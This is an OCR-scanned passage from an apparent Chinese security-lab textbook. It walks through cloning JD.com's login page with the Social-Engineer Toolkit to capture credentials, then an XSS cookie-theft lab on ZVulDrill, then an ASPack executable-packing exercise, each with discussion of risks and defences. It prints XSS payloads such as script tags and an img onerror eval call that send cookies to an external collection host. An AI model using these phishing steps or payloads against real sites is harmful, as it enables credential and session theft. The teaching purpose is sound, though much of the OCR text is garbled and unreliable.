The second method will completely clone a website of your chüpsing 
and allow you to utilize the attack vectors within the сотре щу, 
same web application you were attempting to clone 


The third method allows CWT SL E grpayebsit® pote fhgt-you 


роба ату H Рр ах . ҺӘ мһер иѕ о Ке арі меб: те 
fufatio 和 和 ti 


1) Web Templat 
2) Site Clo! 


3) Custom Import 


99) Return to Webattack Menu 





图 6-44 选择 网 站 克隆 方式 


File Edit View Terminal Help 


applications that it can utilize within the attack. 


The second method will completely site-e£—yQur choosing 
and allow you to utilize the atta within the compteġely 
same web application you were attempting to-etone 


The third method allows you to import иг ownwébsite, grat 


yw 
should only have an index.html when using thé import 


Web Templates 
Site Cloner 
Custom Igport 


кегп 00 НЗ с C 


server will POST to. 
If you're using an extern , use your external IP for this 


k> IP address for the POST back in Harvestes/Tabnabbing|ht 192.1 


SET supports both HTTP and HTTPS 
Example: http://www. th fak 
:weba > Enter the url to 








图 6-45 输入 攻击 机 的 IP 地 址 





3i 











步骤 9. 在 如 图 6-46 所 示 操 作 界 面 的 Enter the url to clone: 后 面 输入 需要 进行 克隆 
站 的 URL, 以 便 针 对 访问 网 站 进行 钓鱼 操作 。 例 如 ,本 实验 将 针对 ”京东 ”的 用 户 登 录 界 画 
进行 网 络 钓鱼 ,所 以 可 在 浏览 器 的 地 址 栏 中 首先 打开 将 要 被 克隆 的 “京东 ”用 户 登 录 页 面 对 
应 的 URL , 当 能 够 正常 访问 后 ,将 对 应 的 URL 复制 到 Enter the url to clone: 后 面 。 
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^ v х root@bt: /pentest/exploits/set 
File Edit View Terminal Help 


The second method will comp y 
and allow you to utili the attack vectors with 
sam 


The third method allows 


ould only hi 
functionality. 


ttack Мери 


s 0.46 7 Tos ox wo 有 Nag T 
IP,luse у rnal IP for 
ss for the POST n ster/Tabi 


图 6-46 复制 要 克隆 的 钓鱼 网 站 的 URL 





步骤 10; 复制 成 功 后 ,在 如 图 6-47 所 示 的 操作 界面 中 进行 监听 ,一 旦 有 数据 通过 克隆 





的 网 址 发 送出 去 ,就 会 被 监听 到 。 


у X root@bt: /pentest/exploits/set 
File Edit View Terminal Help 


upport h HTTP and HTT 
http mw. thisisafakesite .com 
є Enter the url to clone:https://passport.jd.COWWew/login.aspx?Ret 
lurnURL-htt p: 2F 3Futm source&3DmedT3 u Ll IT „к; 26utm 
gn%3D%26utm_te 


[*] Cloning the website: https://passport.jd.Com/new/login.asB@x?ReturnhttÜR3A%2F 
%2Fwww.jd.coms2F%3Futm sourc IDmedi. 6utm medium*s3Dcpcx26utfl campaign*3D*26utm| 
term term&3Dsemmedia 1 15 

[*] This could take a little bit... 


В 6-47 进行 数据 监听 





步骤 11: 返回 靶 机 Windows XP, 输 入 网 址 “http://192. 168. 1. 37/index2. html”, 该 网 
址 是 程序 克隆 出 来 的 网 站 地 址 ,所 显示 的 网 站 信息 即 被 克隆 的 钓鱼 网 站 信息 .如 图 6-48 


所 示 。 
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A EG - Nicrosoft Internet Explorer 





ктт} RO) SEV био) ТАТ #000 


Ё® 
Qa- О-В АФ Ds yr 62-2 8-[Je8 
Hh D) [E] http://192 166.1.37/index2.htal Era ss 
京东 1 
< )) 25 rosz 

















图 6-48 被 克隆 的 钓鱼 网 站 


步骤 12: 在 该 钓鱼 网 站 上 输入 用 户 名 和 密码 ,并 单 击 * 登 录 ” 按 钮 进行 提交 ,如 图 6-49 
所 示 。 


登录 京东 - Nicrosoft Internet Explorer 


XFO REO ЯБУ KEA IR EHW 
Qa- O- [9 |) Рая угш» © 2-2 m - е 


Hb Q) ttp: //192 168 1 31/index2. htal 


[English] 


huhong 


DEHER хіты? 








图 6-49 ”在 钓鱼 网 站 上 尝试 进行 用 户 登 录 
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步骤 13: 刚才 的 尝试 登录 信息 将 被 攻击 机 检测 到 ,所 输入 的 用 户 名 和 密码 将 显示 在 攻 
击 机 上 ,如 图 6-50 #775. 














^ v X root@bt: /pentest/exploits/set 
File Edit View Terminal Help 


y ә b 
/ НТТР/1.1 ) 
HTTP/1.1" goo 








图 6-50 在 攻击 机 上 显示 钓鱼 网 站 上 用 户 尝试 登录 的 信息 


6.4.4 任务 与 思考 


在 本 实验 的 基础 上 ,读者 可 以 对 网 络 钓鱼 攻击 相关 的 内 容 进 一 步 进行 深入 学 习 。 伪 装 
性 高 .时 效 性 强 、 存 活 时 间 短 及 钓鱼 目标 广泛 等 是 网 络 钓鱼 攻击 的 主要 特点 。 网 络 钓 鱼 总 是 
与 其 仿冒 的 目标 有 很 强 的 关系 ,并 存在 一 定 的 迷惑 性 ,如 合法 链接 相似 的 域名 、 使 用 指向 合 
NE EMOR S 只 有 提供 的 页 面具 有 诱惑 性 ,才能 诱导 用 户 输入 自 





网 络 钓鱼 者 首选 的 策略 是 通过 短信 (有 些 会 利用 伪 基 站 )、 邮件 等 方式 大 量 发 送 诈骗 信 
息 ,冒充 成 一 个 可 信和 的 组 织 机 构 ,去 引诱 尽 可 能 多 的 网 络 用 户 。 钓 鱼 者 会 发 出 一 个 让 用 户 采 
取 紧 急 动 作 的 请 求 ,告诉 用 户 应 根据 提示 来 保护 自己 的 利益 免 受 侵害 ,其 中 这 些 欺 骗 性 的 电 
子 邮 件 或 短信 中 都 会 包含 一 个 容易 混淆 的 链接 ,该 链接 指向 一 个 假冒 可 信 组 织 机构 的 网 页 。 
钓鱼 者 希望 受害 者 能 够 被 欺骗 ,从 而 向 这 个 假冒 的 \ 但 看 起 来 几乎 没有 任何 破绽 的 所 谓 可 信 
组 织 机 构 的 “官方 ”网 站 提供 的 页 面 中 输入 他 们 的 个 人 敏感 信息 。 被 钓鱼 者 所 青睐 的 可 信和 组 
织 机 构 包 括 银 行 、 电 子 商 务 平台 (如 淘宝 、 京 东 等 )、 高 校 \ 政 府 机 关 等 。 
以 退 款 骗局 为 例 进 行 说 明 。 此 类 钓鱼 欺诈 的 总 体 特点 是 : 骗子 首先 会 通过 一 些 渠 道 获 
取 到 受害 者 的 网 购 信息 ,利用 受害 者 付款 后 等 待 收 货 的 时 间 段 这 一 特征 来 假冒 卖家 或 客服 ， 
通过 打 电 话 的 方式 联系 买 家 ,以 支付 系统 问题 等 说 词 诱导 受害 者 进行 退 款 操作 。 随 后 ,骗子 
会 给 受害 者 发 去 链接 , 当 受 害 者 打开 该 链接 后 看 到 的 是 与 高 仿 某 知名 电 商 的 钓鱼 网 页 。 钓 
鱼网 页 会 诱导 受害 者 输入 支付 宝 账号 、 密 码 、 银 行 卡号 .身份 证 号 .手机 验证 码 等 诸多 资料 ， 
盗 刷 用 户 支付 宝 和 银行 卡 。 
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6.5 XSS 获取 Cookie 攻击 


6.5.1 预备 知识 : ZvulDrill, WampServer 和 XSS 平台 


1. ZvulDrill 

在 学 习 和 研究 Web 漏洞 的 过 程 中 ,读者 需要 对 每 一 种 漏洞 进行 测试 ,以 便 验证 其 存在 
的 安全 问题 后 开发 相应 的 攻击 工具 。ZVulDrill 是 一 个 功能 相对 单一 的 Web 漏洞 演练 平 
台 ,通过 该 平台 ,安全 测试 人 员 可 以 通过 实验 操作 了 解 某 一 具体 漏洞 的 特点 ,并 对 该 漏洞 的 
利用 价值 和 利用 方法 等 有 一 个 更 深入 全 面 的 认识 。 

2. WampServer 

WampServer 是 一 款 运 行 在 Windows 环境 下 的 整合 了 多 个 应 用 软件 的 软件 包 , 它 集成 
Y Apache Web 服务 器 .PHP 解释 器 及 MySQL 数据 库 , 是 一 个 集成 安装 环境 的 服务 器 软 
件 。 通 过 WampServer, 开 发 人 员 和 服务 器 网 站 管理 人 员 既 不 需要 使 用 较 多 时 间 和 精力 来 
配置 和 测试 运行 环境 ,也 避免 了 独立 安装 和 配置 不 同 软件 时 由 于 版 本 和 配置 等 原因 可 能 存 
在 的 冲突 。 

LAMP 是 基于 Linux 的 集成 开发 环境 ,包含 了 Apache, MySQL/MariaDB 和 PHP, f 
个 程序 都 符合 开放 源 代码 标准 。 其 中 ,Linux 是 开放 源 代码 的 操作 系统 ; Apache 是 最 通用 
的 网 络 服务 器 软件 ; MySQL 是 带 有 基于 网 络 管理 附加 工具 的 关系 数据 库 ; PHP 是 一 种 可 
用 Perl 或 Python 代替 的 流行 的 对 象 脚本 语言 , 它 吸收 了 多 数 其 他 语言 的 优秀 特征 ,使 得 网 
络 开发 更 加 高 效 。 

开发 者 在 Windows 操作 系统 下 使 用 这 些 原 来 只 能 在 Linux 环境 下 才能 运行 的 工具 , 称 
为 WAMP。 

3. XSS 平台 

XSS 平台 可 以 帮助 安全 测试 人 员 对 XSS 相关 的 漏洞 特点 及 其 存在 的 危害 性 进行 深入 
学 习 。 通 过 XSS 平台 ,读者 可 以 了 解 到 KSS 存在 的 安全 问题 及 产生 的 原因 。XSS 的 功能 
包括 窃取 Cookie、 后 台 增 删改 文章 、 网 络 钓鱼 ` 利 用 XSS 漏洞 进行 传播 ,修改 网 页 代码 、 网 站 
重 定向 、 获 取 用 户 信息 (如 浏览 器 信息 、IP 地 址 ) 等 。 


6.5.2 实验 目的 和 条 件 








1. 实验 目的 

通过 本 实验 ,使 读者 主要 掌握 以 下 内 容 。 
(1) 通过 XSS 平 台 获 取 XSS 代码 的 方法 。 
(2) XSS 代码 获取 Cookie 攻击 的 原理 。 
(3) ZvulDrill 平台 的 基本 功能 。 

2. 实验 条 件 

本 实验 所 需要 的 软 硬 件 清 单 如 表 6-3 所 示 。 
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表 6-3 XSS 获取 Cookie 攻击 实验 清单 





























类 型 F s 软 硬 件 要 求 я ж 
1 数量 16 
攻击 机 2 操作 系统 版 本 Windows 7 
3 软件 版 本 Firefox 等 浏览 器 
ü: 数量 16 
靶 机 2 操作 系统 版 本 Windows Server 2008 
3 软件 版 本 ZvulDrill, WampServer 


6.5.3 实验 过 程 


需要 说 明 的 是 ,在 进行 以 下 实验 操作 之 前 ,需要 事先 安装 和 配置 ZvulDrill 和 
WampServer 软件 。 有 关 ZvulDrill 和 WampServer 软件 的 安装 和 配置 方法 ,请 读者 参阅 相 
关 的 技术 文档 ,在 此 不 再 详 述 。 另 外 ,在 实验 中 ,攻击 机 要 能 够 访问 互联 网 。 本 实验 分 为 以 
下 3 个 阶段 进行 。 

1. 在 靶 机 上 开启 ZvulDrill 

步骤 1. 以 系统 管理 员 的 身份 正常 登录 靶 机 Windows Server 2008, 随后 打开 
phpMyAdmin—ZvulDrill 数据 库 。 具 体操 作为 : 进入 程序 Wamp 安装 目录 (本 实验 为 C:\ 
wamp) 中 ,打开 wampmanager. ехе 程序 ,成 功 运行 后 ,可 在 右 下 角 看 到 托盘 图 标 ,如 图 6-51 
所 示 。 























“wampmanager.exe” 


可 在 右 下 角 看 到 托盘 图 标 


vanpnanacer. exe (PRANA: 2010/12/21 9:40 ONRAN: 2016/11/23 14:29 
Aj: at m 











图 6-51 运行 wampmanager. exe 程序 





步骤 2: 打开 右 下 角 托 盘 图 标 中 的 Wamp 菜单 .选择 phpMyAdmin 选项 打开 数据 库 ， 
在 其 中 可 以 看 到 ZVulDrill 数据 库 ,如 图 6-52 所 示 。 
步骤 3: 打开 ZVulDrill 数据 库 , 可 显示 其 详细 内 容 , 如 图 6-53 所 示 
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i, localhost / mysql wapsar X 





ORE TIMIRL-O- inde т а шт 
А вяра XXn @ 亲手 上 路 _ жю! Бней Ф Rupha d FARRE 
phpMuAdmin 
$4976 
BRW E " 
p = ҮТЕ Wamp” ST 
dj y Information. schema sms 9: * ESS: mysql wampserver › 
Га туза tfemb4, general ci E (127.0.0.1 via TCP/IP) 
formance. schema 。 服 务 器 类 型 : MySQL 
— * ESEE : 55.17 - 
Ку C TT 
可 见 “zvulDrilr BRE [xm 
EU, «шя: 10 
s * MA: roctülocalhost 
sx-cweesmetes E) REA 
Ф ЕМ: | pmahomme J Unicode (И) 
“=s:|ezx Ж 
P tsan 

















*Apache/249 (Win64) |ы Start АП Services 
d Stop Al Services. 
Restart АП Services 


Jot Online 








6-52 显示 ZVulDrill 数据 库 





























х 
admi n/#PHAVRL-9 php? db=n hle=as e las пе у а о = 
im 最 党 访问 лла @ 新 手 上 路 жю 加 онаи Ф УРБА d PRE 
рһрМуАатіп ql warnpserver > @ 2218 
гө е июв Ыз 4 mE ij mW щен шәл NE xs 权限 
| (局 用 的 向) Ё ®. т а ат нин 
g New = 
#72 бума ° 
E Information schema Г. admin MIMA GRE ONA QUOND OM 1 MyISAM ине делега ci 
Ea туза! 
#3 performance_schema Г comment | 浏览 е 19 + HUE RCM. Quos QUEE 3 MyISAM utf8_general_ci 
dg test — 
Г users 浏览 及 结构 а 搜索 ROO. ЯС ӘЖ | MyISAM utf& general сї 
Фи comment зка 5 InnoDB latini ewedish ci 6,5 300 


der. users 





t res ШЕЛ жый: J 





З тїї Ei 


insane | 





аж жюё: = 











A 6-53 显示 ZVulDrill 数据 库 的 详细 内 容 


步骤 4: 图 6-54 所 示 的 是 ZVulDrill 数据 库 中 的 数据 信息 ,其 中 admin 表 中 为 
ZVulDrill 平台 管理 员 信息 。 

步骤 5: 图 6-55 所 示 的 是 ZVulDrill 数据 库 中 comment 表 中 的 数据 信息 , 即 ZVulDrill 
平台 留言 板 信息 。 
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phpMyAdmin 
BOOG 

ную 1 

New 

EG бума 

南 Information schema 

#8713 туза! 

$a performance, schema 

£ 

ds test 


comment 
ihi users 















ойк и бы Q а аж XO MA BS GA = BÑ v Us 


wv 正在 号 示 第 0 - 0 £1 Gt 1 (7, 8191228 0.0000 W) 


SELECT « FROM admin 


Г {ЕЙТ L'UGISRR ] R68 ] [解析 SQL] [ 创建 PHP 代码 ] [刷新 ] 


查询 结果 控 作 | 


& HESS а 打印 预览 (2227) G 导出 wb 旦 示 图 表 国 新 建 视图 





图 6-54 ZVulDrill 数据 库 中 admin 表 中 的 数据 信息 














о e [S == 











phpMuAdmin 
289016 

| абз). Е 

a New 
фа dwa 
713 Information schema 
Ema туза! 
#19 performance, schema 
南 - test 
2-9 zvuldrill 





加 最 党 访问 ， 火 扳 官方 站 点 @ 新 手 上 路 _ RAP 四 京东 商城 Ф ШЫ db 网 页 快讯 库 





Е Е ment 


аже ив L] SQU а SERO жы s GM аел 权限 


v 正在 显示 第 0 - 2 行 ( 共 3 (7, 0194238 0.0000 8) 


SELECT * FROM `conaent 


Г REPE RRR] [编辑 ] [解析 SQL] [ 创建 PHP 代码 ] [ 剧 新 ] 


下 comment id user name comment text pub date 
г QR x ES әне admin 123 2017-06-02 
г QUAS XEM QN admin 1234 2017-06-02 
г гав кян әне admin abc 2017-06-02 


S й: нш Ome BSH 


2 








Tecalhost/phpeyadnin/zql.php?db-zvuldri1lätable=commentäsql_query-SELECT i раа АШ text button-läpftert-Fåtoken-538e1980f8c7a45cf1 48350453003 | = | 





图 6-55 ZVulDrill 数据 库 中 comment 表 中 的 数据 信息 


步骤 6: 图 6-56 所 示 的 是 ZVulDrill 数据 库 中 u 


合 注册 用 户 信息 。 


表 中 的 数据 信息 , 即 ZVulDrill 5l 








K 
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è 
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n 7 user id user name user pass шег avatar “user bio join date 
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Darkshelphp 


BARE 
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В 6-56 ZVulDrill 数据 库 中 users 表 中 的 数据 信息 


2. 通过 XSS 平台 获取 XSS 代码 

步骤 1: 在 攻击 机 上 ,打开 FireFox 等 Web 浏览 器 ,访问 XSS 平台 。 其 中 ,XSS 平台 的 
URL 地 址 为 http: //xsspt. com, 登 录 XSS 平台 后 的 主 界面 如 图 6-57 所 示 。 如 果 事 先进 行 
了 注册 ,可 直接 通过 该 界面 登录 ,否则 单 击 “ 注 册 ” 按 钮 ,进入 注册 新 用 户 界面 。 


Ф oxssércBtesese nlt x 














(=) а xsspt. com/index. php?do=login ою cj|[aas |йё + f t 5 - = 
B 最 常 访问 Ааа @ 新 手 上 路 常用 同 址 ~ 正在 连接 ”~ 正在 连接 ”四 京东 商城 b RUEDA » 口 移动 版 书签 


主页 


нњ Z 
À 


主 册 "按钮 
2 я раа 进入 注册 用 户 界面 





登陆 


开放 注册 ， 仅 用 于 安全 测试 ! 











6-57 XSS 平台 主 界面 
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步骤 2: 本 实验 单 击 “ 注 册 ” 按 钮 。 当 读者 进入 注册 新 用 户 界 面 后 , 按 要 求 填 人 注册 信息 ， 
注册 一 个 新 账户 , 当 完 成 注册 操作 后 ,新 注册 的 账号 会 自动 登录 “XSS 平 台 ”, 如 图 6-58 所 示 。 
单 击 “ 我 的 项 目 ” 右 侧 的 “创建 ”按钮 ,创建 一 个 新 项 目 。 创 建 此 项 目的 目的 是 用 来 获取 存在 
XSS 网 站 (本 实验 中 ,该 网 站 为 读者 在 前 面 搭建 的 "ZVulDrill 漏洞 演练 平台 ”) 的 Cookie 值 。 
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我 的 项 目 


项 目 名 称 项 目 描述 内 容 数 创建 时 间 操作 
жиш 


单 击 " 创 建 "按钮 ， 
创建 一 个 新 项 目 










图 6-58 新 注册 用 户 登 录 后 的 界面 


步骤 3: 在 打开 的 对 话 框 中 , 填 入 项 目 名 称 和 项 目 描述 (此 项 可 不 填 ) ,然后 单 击 “ 下 
步 "按钮 ,如 图 6-59 所 示 。 


























Ез 
qos nete x 
D | жнр. con/ seter ph ае 4 п 995-2 
虽 移 动 所 书签 
我 的 项 目 
= 
我 的 模块 нж 
[топдуа 
TRU 填 入 项 目 名 称 和 项 目 描述 后 ， 
a 单 击 “下 一 步 "按钮 
到 








В 6-59 填 入 项 目 名称 和 项 目 描述 
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“sah 跳 转 到 如 图 6-60 所 示 的 选择 模块 界面 ,本 实验 中 由 于 只 是 为 了 获取 Cookie 信 
В. 选中 “默认 模块 " 复 选 框 ,然后 单 击 “ 下 一 步 ” 按 钮 继续 。 




















全 二 | |. com/index phprd=proieeoeset=seteoacae=creetesi _ UN c Ж cus ws... »- = 
а 最 党 访问 яа @ 新手 上 路 常用 网 址 加 正在 连接 ”加 ЕЕН Dess e ора d 网 页 快讯 库 日 移动 版 书签 
我 的 项 目 配置 代码 
项 目 名 称 
我 的 模块 
公共 模块 
(D autom VERSER 模块” 
Ps 选择 "默认 模块 
* C BRARIP 
lu ri 
eC м шырт 
， 丰 革职 保存 的 明文 宰 码 
* Г 获取 页 面 源码 
F 自 定义 代码 
| 
2] 





图 6-60 选择 模块 界面 


步 又 5. 跳 转 到 如 图 6-61 所 示 的 项 目 名 称 界面 ,可 以 看 到 后 续 实 验 所 需 的 KSS 代码 ， 
此 代码 用 于 获取 目标 网 站 的 Cookie 信息 ,将 其 复制 一 份 。 然 后 单 击 “ 完 成 ”按钮 ,完成 创建 
新 项 目 。 

3. 获取 用 户 的 Cookie 信息 

返回 靶 机 ,访问 ZvulDrill 平台 并 创建 含有 KSS 代码 的 新 用 户 , 同 时 获取 该 用 户 的 
Cookie 信息 。 

步骤 1: 在 Web 浏览 器 中 输入 *ZVulDrill 漏洞 演练 平台 ”的 URL 地 址 (http://127.0.0.1/ 
ZVulDrill zk http: //localhost/ZVulDrilD ,打开 ZvulDrill 平台 的 主 界面 ,如 图 6-62 所 示 。 
单 击 “ 注 册 ” 按 钮 ,进入 注册 新 用 户 界面 

步骤 2: 在 注册 新 用 户 界面 填 入 注册 信息 息 ,在 注册 用 户 的 用 户 名 后 粘贴 刚刚 复制 的 XSS 
代码 ,如 图 6-63 所 示 o 

示例 注册 信息 为 : 









































用 户 : hongya < script src = http://xsspt.com/rseDfn?1498122710 ></script> 
密码 : 123456 
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SSE EHDA (注意 的 转 义 )】 , 即 可 在 








或 者 以 你 任何 下 要 的 方式 插入 


http://xsspt.com/rseDfn?149811: 








Rus 





MAHTI 





«script src=http://t.cn/Roflye9ye/script> 
再 或 者 以 你 任 何 昌 要 的 方式 振 入 


<img srcox onerrorseval(atob 
врознысзз }Р5додняжо1веннтснду 
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钮 ， 完 成 创建 














图 6-61 项 目 名 称 界面 
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一 个 简单 的 Web 漏 洞 演练 平台 








一 个 简单 的 留言 板 ， 包 含 SQL 注入 ，XSS，CSRF 等 常见 的 Web 漏 洞 
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图 6-62 ZvulDrill 平台 主 操作 界面 
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] P Ж hongya 后 的 < script src 一 http://xsspt. com/rseDfn? 1498122710 ></ 
script > 是 在 XSS 平台 复制 的 获取 Cookie 的 XSS 代码 。 
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me: 
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же : 


注册 信息 


用 户 : hongya<script src=http://xsspt.com/rseDfn?1498122710> </script> 
ЭЙ : 123456 
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确认 : 123456 
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6-63 ”注册 用 户 界面 
步骤 3: 单 击 “ 注 册 ” 按 钮 ,完成 注册 ,该 注册 用 户 会 自动 登录 ZVulDrill 平台 ,如 图 6-64 
所 示 。 此 时 ,已 经 获取 到 刚刚 创建 的 用 户 在 ZVulDrill 平 台 的 Cookie 信息 。 


© ioci 
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该 用 户 已 自动 登录 ZVulDrill 平 台 
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6-64 ”用 户 自动 登录 ZVulDrill 平 台 
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步骤 4: 返回 XSS 平 台 , 打 开 前 面 实验 中 创建 的 XSS 项 目 , 如 图 6-65 所 示 。 
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打开 创建 的 Xss 项 目 


创建 时 间 操作 


公共 模块 
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图 6-65 打开 XSS 项 目 


步骤 5: 可 以 看 到 在 : 


图 6-66 所 示 。 





验 中 插入 的 XSS 代码 已 获取 到 了 目标 用 户 的 Cookie 信息 ， 


如 
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插入 的 xss 代 码 ， 所 
获取 的 cookie 信 息 











В 6-66 XSS 代码 已 获取 到 了 目标 用 户 的 Cookie 信息 
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步骤 6: 单 击 “ 展 开 ” 按 钮 ,可 看 到 如 图 6-67 所 示 的 详细 信息 。 
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Request Headers 
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6-67 显示 目标 用 户 的 详细 Cookie 信息 


6.5.4 任务 与 思 











为 了 提高 用 户 的 互联 网 应 用 体验 ,现在 许多 网 站 中 包含 了 大 量 的 动态 显示 内 容 。 为 了 
与 早期 的 显示 固定 信息 的 静态 网 站 进行 区 分 ,将 这 种 提供 动态 信息 显示 功能 的 网 站 称 为 动 


态 网 站 。 所 谓 动态 显示 内 容 , 是 指 根据 用 户 环境 和 需要 , Web 应 用 程序 能 够 动态 
应 用 户 所 需要 的 信息 。 

动态 站 点 会 受到 “ 跨 站 脚本 攻击 ”(Cross Site Scripting) ,为 了 与 层 释 样式 表 (C 
Style Sheet,CSS) 区 分 , 故 称 XSS 的 威胁 ,而 静态 站 点 则 完全 不 受 其 影响 。 恶 意 攻 刘 





也 输出 相 


ascading 


者 会 在 


Web 页 面 中 插入 恶意 Script 代码 , 当 用 户 浏览 该 页 时 ,嵌入 Web 中 的 恶意 Script 代码 会 被 


执行 ,从 而 达到 恶意 攻击 用 户 的 目的 。 











XSS 攻击 可 以 分 为 两 种 类 型 : 非 持久 型 XSS 攻击 与 持久 型 KSS 攻击 。 其 中 ， 





非 持 久 型 


XSS 攻击 是 一 次 性 的 , 仅 对 当 次 的 页 面 访问 产生 影响 ; 非 持久 型 XSS 攻击 要 求 用 户 访问 一 


个 被 攻击 者 算 改 后 的 链接 ,用 户 访问 该 链接 时 ,被 植 信 的 攻击 脚本 被 用 户 浏览 器 执 








行 , 从 而 


达到 攻击 目的 。 持 久 型 XSS 攻击 会 把 攻击 者 的 数据 存储 在 服务 器 端 ,攻击 行为 将 伴随 着 攻 





击 数据 一 直 存 在 。 
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移动 互联 网 (Mobile Internet, MD) 是 一 种 通过 智能 移动 终端 采用 移动 无 线 通信 方式 获 
取 业 务 和 服务 的 新 兴业 态 ,包含 终端 .软件 和 应 用 3 个 层面 。 其 中 ,终端 层 包括 智能 手机 、 平 
板 电脑 电子 书 等 ,软件 层 包 括 操作 系统 .中 间 件 .数据 库 和 安全 软件 等 ,应 用 层 包括 休闲 娱 
乐 类 、 工 具 媒 体 类 、 商 务 财经 类 等 不 同 应 用 与 服务 。 近 年 来 , 随 着 智能 手机 等 移动 终端 的 普 
及 ,各 类 APP(Application ,应 用 ) 等 应 用 的 丰富 ,以 及 4G/5G, WiFi 等 无 线 接 入 方式 的 发 
展 ,移动 互联 网 已 经 不 是 单纯 作为 传统 互联 网 的 补充 ,而 是 正在 以 独特 方式 引领 着 互联 网 技 
术 的 发 展 和 变革 。 应 用 的 快速 发 展 带 来 了 安全 威胁 的 日 益 严 峻 ,本 章 通过 具体 实验 ,使 读者 
对 移动 互联 网 应 用 安全 从 攻击 和 防范 两 个 角度 有 一 个 较为 全 面 的 认识 。 





7.1 fF M >ë 


7.1.1 预备 知识 : 逆向 工程 


逆向 工程 也 称 为 “ 反 向 工程 ”在 信息 技术 领域 是 指 对 一 个 信息 系统 或 软件 进行 的 逆向 分 析 
及 研究 ,从 而 得 到 系统 或 软件 的 架构 和 开发 源 代 码 等 要 素 , 进 而 对 其 进一步 分 析 或 优化 处 理 。 

攻击 者 也 可 以 利用 逆向 工程 原理 和 思路 ,采用 逆向 分 析 工 具 对 一 些 自 认 为 有 利用 价值 
的 软件 进行 反 编译 ,并 在 反 编译 后 的 程序 中 加 入 恶意 代码 ,经 再 次 编译 (二 次 打包 ) 后 上 传 到 
一 些 审核 不 严 的 免费 网 站 (如 手机 应 用 商店 .手机 软件 商店 等 ) 供 用 户 下 载 ,以 达到 入 侵 和 窃 
取 用 户 信息 的 目的 。 

对 于 大 量 使 用 的 基于 Android 开源 系统 的 应 用 软件 ,目前 出 现 了 许多 汇编 和 反 汇 编 工 
具 , 如 smali 和 baksmali。 首 先 , 使 用 baksmali 反 汇 编程 序 对 有 利用 价值 的 客户 端 软 件 及 木 
马 程序 进行 反 汇 编 , 然 后 对 反 汇 编 结果 进行 整合 (整合 过 程 中 还 会 尽 可 能 地 隐藏 木马 程序 的 代 
码 ) ,之 后 再 利用 smali 汇编 工具 进行 汇编 编译 ,生成 最 后 的 二 次 打包 可 执行 文件 (DEX 文件 ) 。 

ASPack 是 高 效 的 Win32 可 执行 程序 压缩 工具 ,能 对 程序 员 开 发 的 32 位 Windows 可 
执行 程序 进行 压缩 。 目 前 大 家 经 常 使 用 的 一 些 压缩 工具 ,通常 是 将 计算 机 中 的 文档 进行 压 
缩 以 便 缩小 储存 空间 ,但 是 压缩 后 就 无 法 直接 运行 ,如 果 想 运行 必须 解压 缩 。 另 外 , 当 用 户 
的 系统 中 没有 安装 压缩 软件 时 ,压缩 包 将 无 法 打开 。 而 ASPack 是 专门 对 Win32 可 执行 程 
序 进 行 压缩 的 工具 ,压缩 后 程序 能 正常 运行 。 而 且 即 使 用 户 已 经 将 ASPack 工具 从 系统 中 
删除 ,经 ASPack 压缩 过 的 文件 仍然 能 正常 使 用 。 使 用 ASPack 工具 压缩 后 仍然 能 够 执行 
这 一 功能 特征 ,是 可 以 实现 对 文件 加 壳 操 作 的 。 


7.1.2 实验 目的 和 条 件 


1. 实验 目的 
在 移动 应 用 中 ,应 用 程序 来 源 的 真实 性 和 可 靠 性 决定 着 应 用 的 安全 性 ,在 国内 的 移动 用 
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户 端 ,Android 智能 终端 占有 绝对 的 应 用 比例 ,然而 由 于 Android 自身 所 具有 的 开放 性 ,在 
为 各 类 应 用 的 快速 发 展 提供 了 便捷 的 同时 ,安全 问题 同样 引起 了 社会 各 界 的 普遍 关注 , 尤 
其 是 针对 Android 环境 的 应 用 程序 加 壳 , 更 是 具体 应 用 中 的 主要 威胁 。 通 过 本 实验 的 学 
习 , 使 读者 在 学 习 文 件 加 壳 实 现 原 理 和 方法 的 基础 上 ,了解 加 壳 在 移动 应 用 中 存在 的 安 
全 威胁 。 

2. 实验 条 件 

为 便于 操作 ,本 实验 选择 在 一 台 运 行 Windows XP 及 以 上 版 本 的 计算 机 上 进行 ,同时 需 
要 提供 ASPack 工具 。 


7.1.3 实验 过 程 


步骤 1: 运行 ASPack 工具 ,打开 如 图 7-1 所 示 的 ASPack 操作 界面 。 
步骤 2: 单 击 “打开 ”按钮 ,在 打开 的 如 图 7-2 所 示 的 对 话 框 中 选择 要 进行 加 壳 的 程序 ， 
本 实验 使 用 已 经 准备 的 testl. exe 文件 , 单 击 “ 打 开 ” 按 钮 返回 ASPack 操作 界面 。 











































Win32 EXE, DLL 压缩 程序 
UNREGISTERED 
Eë 212 30 daye maoo ес 
TERE |н | 进项 | 关于 um | —= zum — 
тав 

文件 和 

文件 大 小 压缩 
xM&o. [еа o] 
文件 类 到 (0): [Executable File Images (%.EXE;* DLL; w 取消 

图 7-1 ASPack 操作 界面 72 ”选择 要 加 这 的 程序 


步 又 3: 单 击 “ 压 缩 * 按 钮 ,对 刚才 选择 的 testl. exe 文件 进行 压缩 (加 壳 ) 操 作 , 如 图 7-3 
所 示 。 








Win32 EXE, DLL 压缩 程序 
UNREGISTERED 
Ets 212 [y 30 days 

打开 文件 [EE um | 关于 | | 
































lestl .exe | 








图 7-3 对 testl.exe 文件 进行 压缩 操作 
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步骤 4. 加 壳 操 作 结 束 后 ,打开 原来 存放 testl. exe 的 “测试 程序 1” 文 件 夹 ,可 以 发 现 多 


了 一 个 名 称 为 testl. exe. bak 的 文件 ,这 个 文件 应 该 是 testl. exe 未 加 壳 时 的 备份 文件 ,而 现 
在 的 testl. exe 文件 是 已 经 被 加 壳 后 的 文件 ,如 图 7-4 所 示 。 
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图 7-4 BREMA R E B) X: ff 


步骤 5: f RE FU TRR БРЕ Л 1" 文 件 夹 进行 扫描 ,就 会 发 现 testl. exe 是 被 
加 壳 后 的 程序 。 本 实验 使 用 VirRemv 对 “测试 程序 1 文件 夹 进 行 扫描 ,扫描 过 程 如 图 7-5 
所 示 。 
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7-5 使 用 VirRemv 工具 扫描 存在 加 壳 文 件 的 文件 来 
7.1.4， 任 务 与 思考 


针对 文件 加 壳 的 防范 方法 主要 有 以 下 两 种 。 
1. 签名 验证 


在 应 用 程序 发 布 时 ,每 一 款 应 用 程序 都 会 有 一 个 专门 针对 该 款 软件 的 数字 签名 ,用 来 验 
证 软件 的 具体 身份 信息 ,不 同 厂商 软件 的 数字 签名 不 同 。 由 了 





数字 签名 是 无 法 伪造 的 ,因此 
利用 该 特征 就 可 以 知道 一 款 应 用 程序 是 否 为 正版 软件 。 对 于 加 入 了 数字 签名 验证 代码 的 软 
